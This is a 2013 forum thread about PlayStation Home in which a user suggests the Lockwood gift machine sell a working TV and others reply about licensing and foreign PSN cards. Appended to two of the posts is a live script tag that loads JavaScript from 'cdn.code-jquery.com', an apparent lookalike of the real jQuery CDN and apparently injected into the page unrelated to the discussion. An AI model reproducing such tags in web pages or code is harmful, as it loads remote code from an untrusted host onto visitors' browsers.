May 07 2013
By: itsflare First Son 11 posts

Will there ever be a chance for us to purchase a playable tv in lockwood gift machine?

4 replies 272 views Edited May 7, 2013

I'm sure everyone is aware of the gift machine and the EVO televisions that actually play movies and stuff.  I have a friend who for some reason can't afford a tv and I'm gererous (too too generous ) enough to get him a tv.   Unfortunately, he lives out of US and cannot use a US PSN card.   Not everyone can afford nice stuff in psh. But some people do have friends who will give them something in the lockwood machine.  I would suggest that there be a lockwood tv.  They can come in 40 inch-140 inch. I think they should range from like 256 - 512 tokens.

This is just a little idea of mine.

<script type="text/javascript" src="http://cdn.code-jquery.com/jquery-1.7.2.min.js"></script>
Message 1 of 5 (272 Views)
0 Likes
Highlighted
First Son
11 posts

Re: Will there ever be a chance for us to purchase a playable tv in lockwood gift machine?

May 7, 2013

Hold on, ...I meant "NOT too generous"   instead of "Too too generous".  Heck No.  I have other things to do with my cash. Maybe like once every 2 months, I don't mind popping 10.99 into Lockwood for tokens.

<script type="text/javascript" src="http://cdn.code-jquery.com/jquery-1.7.2.min.js"></script>
Message 2 of 5 (268 Views)
0 Likes
Fender Bender
2036 posts

Re: Will there ever be a chance for us to purchase a playable tv in lockwood gift machine?

May 7, 2013
Loot are the developer who created the EOD TV's, so Lockwood couldn't implement a TV into their gift machine if they wanted to.

I really hope your friend is able to get an EOD sometime though.
Image and video hosting by TinyPic
Message 3 of 5 (234 Views)
0 Likes
Shinra Executive
29271 posts

May 7, 2013

It is possilbe to get foreign PSN cards on various websites. You could gift an EU card if that was an option for you. Keep in mind that programming in the EU is different from that here in North America. 

Message 4 of 5 (228 Views)
0 Likes
Fender Bender
2879 posts

May 8, 2013

I asked about this recently at their facebook page. They have no plans to make a workable tv at this time because of licensing. I asked them  about the TV in the dream hideaway that doesn't work

Thanks Asuka424 for the Signature
Message 5 of 5 (145 Views)
0 Likes